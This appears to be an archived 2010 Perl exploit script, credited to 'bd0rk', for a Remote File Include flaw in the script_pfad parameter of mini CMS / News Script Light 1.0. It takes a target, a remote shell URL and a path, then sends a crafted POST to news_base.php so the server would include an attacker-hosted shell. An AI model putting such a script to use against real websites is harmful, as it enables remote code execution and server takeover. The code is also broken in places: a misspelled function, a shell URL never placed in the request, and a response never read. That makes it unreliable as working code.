minicmsnews-rfi.txt
Posted on 27 August 2010
#!/usr/bin/perl #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # mini CMS / News Script Light 1.0 Remote File Include Exploit # # Bug found and exploit written by bd0rk || SOH-Crew # # Vendor: http://www.hinnendahl.com/ # # Downloadsite: http://www.hinnendahl.com/index.php?seite=download # # Description: The script_pfad parameter in news_base.php isn't declared before require # # Contact: bd0rk[at]hackermail.com # Website: www.soh-crew.it.tt #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ use Getopt::Long; use URI::Escape; use IO::Socket; $shellcode = "http://yourshellsite.com"; main(); sub usage { print "mini CMS / News Script Lite 1.0 Remote File Include Exploit "; print "Bug found and Exploit written by bd0rk "; print "-1, --target target (yourhost.com) "; print "-2, --shellpath shell (http://yourshellsite.com) "; print "-3, --dir Directory (/news_system) "; exit; } sub main { GetOptions ('1|target=s' => $target, '2|shellpath=s' => $shellpath,'3|dir=s' => $dir); usage() unless $target; $shellcode = $shellpath unless !$shellpath; $targethost = uri_escape($shellcode); $socket = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$target",PeerPort=>"80") or die " Connection() Failed. "; print " Connected to ".$target.", Attacking host... "; $bd0rk = "inst=true&ins_file=".$target.""; $soh = lenght($bd0rk); print $socket "POST ".$dir."/news_system/news_base.php?script_pfad= HTTP/1.1 "; print $socket "Target: ".$target." "; print $socket "Connection: close "; print $socket "Content-Type: application/x-www-form-urlencoded "; print $socket "Content-Lenght: ".$soh." "; print $socket $soh; print "Server-Response: "; { print " ".$recvd.""; } exit; }
